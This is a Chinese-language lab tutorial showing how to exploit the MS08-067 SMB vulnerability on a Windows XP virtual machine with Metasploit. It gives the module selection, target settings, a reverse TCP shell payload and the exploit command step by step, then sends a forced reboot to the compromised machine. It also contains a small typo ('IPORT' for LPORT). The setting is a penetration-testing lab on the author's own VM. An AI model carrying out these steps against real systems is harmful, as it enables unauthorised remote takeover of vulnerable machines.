admin管理员组文章数量:1594261
前期准备
a)攻击主机:为Window10系统(本机)
在Metasploit官方网站下载Windows版本的Metasploit-framework(而不是pro版本),之后安装。在命令行输入 msfconsole 运行Metasploit。
b)目标主机:在网上搜索,安装了WindowsXP虚拟机,在Vmware中装载运行
安装完成后要对WindowsXP虚拟机做如下设置,否则会导致在exploit时显示连接超时或者拒绝连接。关闭防火墙,自动更新即可。
开始渗透测试
查找漏洞
输入命令:search ms08_067
选择模块
输入命令:use exploit/windows/smb/ms08_067_netapi
info命令可以看到此模块的信息
查看该漏洞可浮现操作系统类型
输入命令:show targets
第34个与目标主机匹配
设置目标主机参数
输入命令:show options
输入命令:set RHOSTS 目标主机的IP地址
输入命令:set RPORT 目标主机的端口
目标主机的IP地址:在目标主机命令行中输入 ipconfig 可得
目标主机的端口(本例需要开启445端口):在目标主机命令行输入:netstat -an
可见目标主机的445端口已经开启。如果没有开启,则需要在目标主机的命令行中输入regedit打开注册表,在HKEY_LOCAL_MACHINE中依次打开System\CurrentControlSet\Services\NetBT\Parameters,修改SMBDeviceEnabled的子键值为1。
设置完成之后再次输入 show options
查找并选择合适的攻击载荷
输入命令:show payloads
输入命令:set payload generic/shell_reverse_tcp 选择合适攻击载荷
输入攻击主机的参数
输入命令:set LHOST 攻击主机的IP地址
输入命令:set IPORT 攻击主机的端口
输入命令:set target 34 (34为上述确定)
(IP地址与端口确定同上)
再次输入show options 查看参数设置情况
开始攻击
输入命令:exploit
攻击成功!
测试命令
尝试输入:shutdown -r -f -t 0(为重启命令)
本文标签: 漏洞主机FrameworkMetasploitWindows
版权声明:本文标题:Metasploit-Framework利用ms08_067 漏洞渗透Windows XP SP3(Windows 10 主机) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dongtai/1728183171a1148594.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论